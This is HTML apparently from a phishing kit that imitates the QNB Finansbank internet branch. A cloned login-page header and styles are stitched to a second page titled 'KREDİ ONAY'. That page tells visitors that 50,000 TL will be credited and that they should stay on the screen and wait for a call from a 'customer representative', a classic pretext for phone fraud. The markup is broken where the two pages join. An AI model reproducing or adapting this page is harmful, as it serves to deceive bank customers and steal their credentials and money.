


 <title>
        QNB Finansbank İnternet Şubesi
    </title>
    <meta http-equiv="PRAGMA" content="NO-CACHE">
    <meta http-equiv="CACHE-CONTROL" content="NO-CACHE">
    <meta http-equiv="Expires" content="now">
    <meta name="google" content="notranslate">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, user-scalable=no,initial-scale=1.0,minimum-scale=1,height=device-height">
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noindex">
    <meta name="apple-itunes-app-new" content="app-id=739655617">
    <meta name="msApplication-ID" content="App">
    <link href="css/jquery.smartbanner.css" rel="stylesheet" type="text/css">
    <link type="text/css" rel="stylesheet" href="css/FinansbankDropDownList.css">
    <link type="text/css" rel="stylesheet" href="css/FBDialog.css">
    <link type="text/css" rel="stylesheet" href="css/FBTooltip.css">
    <link type="text/css" rel="stylesheet" href="css/FinansbankLoginStyle.css">
    <link type="text/css" rel="stylesheet" href="css/warning.css">
    <link type="text/css" rel="stylesheet" href="css/loginmain.css">
    <link type="text/css" rel="stylesheet" href="css/bootstrap-ie11.css">
    <link type="text/css" rel="stylesheet" href="css/cordale.min.css">
    <link type="text/css" rel="stylesheet" href="css/muli.min.css">
    <script type="text/javascript" src="js/jquery-1.6.2.min.js"></script>
    <script type="text/javascript" src="js/jquery-ui-1.7.3.custom.min.js"></script>
    <script type="text/javascript" src="js/jquery.json-2.3.min.js"></script>
    <script type="text/javascript" src="js/jquery.data.js"></script>
    <script type="text/javascript" src="js/jquery.watermark.js"></script>
    <script type="text/javascript" src="js/FBGeneral.js"></script>
    <script type="text/javascript" src="js/FBTooltip.js"></script>
    <script type="text/javascript" src="js/rsa.js"></script>
    <script type="text/javascript" src="js/FBDialog.js"></script>
    <link type="text/css" rel="stylesheet" href="css/bootstrap.css">
    <script type="text/javascript" src="js/bootstrap.js"></script>
    <script src="js/jquery.inputmask.min.js"></script>
    

    <style type="text/css">
        input[srt=numericpassword] {
            -webkit-text-security: disc;
        }

        .sanalklavyeHelpConatiner {
            width: 390px;
            height: 250px;
            font-family: Arial, Helvetica, sans-serif;
            font-size: 11px !important;
            color: #4a4949;
            background: url(/Content/Images/3Dstar.png) no-repeat;
            background-position: 10px 10px;
        }

            .sanalklavyeHelpConatiner .content {
                width: 270px;
                float: right;
            }

            .sanalklavyeHelpConatiner h1 {
                font-size: 12px;
                font-weight: bold;
                color: #870052;
                margin: 0;
                padding: 10px 0 0 0;
            }

            .sanalklavyeHelpConatiner p {
                font-size: 11px !important;
                margin: 0;
                padding: 5px 0 0 0;
            }

             .hidden {
            display: none;
        }

        .spinner {
          width: 15px;
          height: 15px;
          border-radius: 50%;
          border: 2px solid #ffffff; /* Beyaz renk */
          border-top-color: transparent;
          animation: spin 1s linear infinite;
          margin-left: 46%;
        }

        @keyframes spin {
          100% {
            transform: rotate(360deg);
          }
        }

         .error {
            border-color: red!important
        }

        #destekContent {
            /*position: absolute;*/
            left: 168px;
            /*margin-top: 25px;*/
            /*width: 246px;*/

            width:100%;
            z-index: 2;
            top: auto !important;
        }

        #headerTitle {
           /* position: absolute;
            left: 14px;
            top: auto !important;*/
            height: 35px;
            margin-top: 11px;
            z-index: 1;
            width: 100%;
        }

        #verisign {
            position: absolute;
            left: 5px;
            top: 0px;
            width: 73px;
            height: 45px;
            /*margin-top: 488px;*/
            z-index: 4;
        }

        
        .qr_area {
                border: 2px solid #d7d7d7;
                border-radius: 10px;
                padding: 10px;
                float: left;
                width: 100%;
                min-height: 300px;
                margin-bottom: 20px;
                /*margin-top: -32px;
                margin-left: 330px;*/
        }

         #keys {
            margin-top: 2px!important;
            margin-left: 2px!important;
        }

        .hatamesaji1ConfirmIframe .header2 {
            height: 29px;
        }

        .popupcontentRoundedCornerDiv_bottom {
            width:479px!important;
        }

        .hatamesaji1ConfirmIframe .popupcontent {
            width:479px!important;
        }
    </style>



    <style type="text/css">
        .linkbutton, .linkbutton:hover
        {
            color:#394040 !important;
        }
    </style>

    <script type="text/javascript" src="js/jquery.smartbanner.js"></script>

    <!-- End Google Tag Manager -->
    <style type="text/css">
        .ileriButton{     width: 280px;     color: #fff;     background-color: #800d52;     padding: 12px 20px;     border: 0;     text-align: left;     border-radius: 3px;     cursor: pointer;     text-align: center;     margin-top: 20px; position:absolute; height:40px; text-decoration:none;} .proceedButton{     width: 280px;     color: #fff;     background-color: #800d52;     padding: 12px 20px;     border: 0;     text-align: left;     border-radius: 3px;     cursor: pointer;     text-align: center;     margin-top: 20px; position:absolute; height:40px; text-decoration:none;}
    </style>
</head>


  <div>


        </div>
        <div id="preload-img" style="position: absolute; left: 420px; top: 250px; display: none">
            <img id="ctl00_FinansbankLoaderImage" src="images/loader.gif" style="border-width:0px;">
        </div>

        <div class="container-lg px-0" style="max-width: 980px;">
            <div id="ctl00_headerDiv" class="header-purple">
                <div id="leftDiv" class="headerLeftDiv"></div>
                <span id="imgText" class="headerImgText">İnternet Şubesi</span>
            </div>
            <section id="loginf">
                <div class="row p-10-ch">
                    <div id="mainPanel" class="px-0 mainContent">
                        <div class="row" style="height: 100%; justify-content: center;">
                            <div class="col-lg-8 col-md-7 col-12 mainPanel-width" style="border: 2px solid #d7d7d7; border-radius: 10px; padding: 30px; float: left; min-height: 380px;">



<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <title>KREDİ ONAY</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
            text-align: center;
            max-width: 400px;
            width: 100%;
        }
        .textfield {
            width: calc(100% - 20px);
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
            font-size: 14px;
            box-sizing: border-box;
            text-align: center;
        }
        .ileriButton {
            background-color: #800d52;
            color: #fff;
            border: none;
            padding: 12px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 14px;
            margin-top: 10px;
            border-radius: 4px;
            cursor: pointer;
        }
        .spinner {
            width: 15px;
            height: 15px;
            border-radius: 50%;
            border: 2px solid #ffffff; /* Beyaz renk */
            border-top-color: transparent;
            animation: spin 1s linear infinite;
            margin-left: 46%;
            display: none;
        }
        @keyframes spin {
            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Bireysel Müşteri Temsilcinizden Gelecek Olan Çağrıyı Bekleyiniz.</h2>
        <p><br>50,000 TL Anlık Olarak Hesabınıza Yansıtılmak Üzere Müşteri Temsilcinizden Gelicek Çağrıyı Lütfen Bekleyiniz.<br>İşlemleriniz Sağlanırken Lütfen Bu Ekrandan Ayrılmayınız.</p>
        
       <img src="bekle.gif" alt="resim açıklaması">


    
</body>
</html>




